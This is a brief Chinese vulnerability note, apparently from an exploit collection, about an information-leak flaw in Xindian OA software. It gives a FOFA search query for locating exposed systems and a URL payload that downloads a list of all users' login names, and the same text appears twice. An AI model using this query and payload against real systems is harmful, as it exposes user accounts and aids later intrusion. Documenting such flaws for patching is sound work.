X2-1新点-OA-InformationLeakage
漏洞描述:
江苏国泰新点软件有限公司新点OA系统访问特定Url时可获取所有用户登录名信息,攻击者在获取后可进一步利用。
网站图片:
网络测绘:
fofa语法:
fofaapp=“新点OA”
漏洞复现:
payload:
/ExcelExport/人员列表.xls
效果图:
江苏国泰新点软件有限公司新点OA系统访问特定Url时可获取所有用户登录名信息,攻击者在获取后可进一步利用。
fofaapp=“新点OA”
payload:
/ExcelExport/人员列表.xls
效果图: